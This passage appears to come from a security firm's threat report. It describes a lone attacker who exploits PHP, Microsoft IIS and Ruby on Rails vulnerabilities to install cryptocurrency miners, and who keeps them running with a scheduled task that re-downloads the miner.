During that period, the lone attacker attempted to exploit 30% of all networks worldwide to find vulnerable web servers in order to mobilize them to his mining pool.
As monitored by our sensors and honey-pots, the attacker attempts to use multiple web server vulnerabilities to inject the malicious code onto the vulnerable machines.
Among the targeted servers we found attacks on PHP, Microsoft IIS, and Ruby on Rails.
It is interesting to note that the scheduler isn’t just being told to run the mining process every hour, it is being told to run the whole process, which includes downloading the file from the server.
The previous attack also leveraged the vulnerability in Ruby on Rails, and shares some common features with the current attack.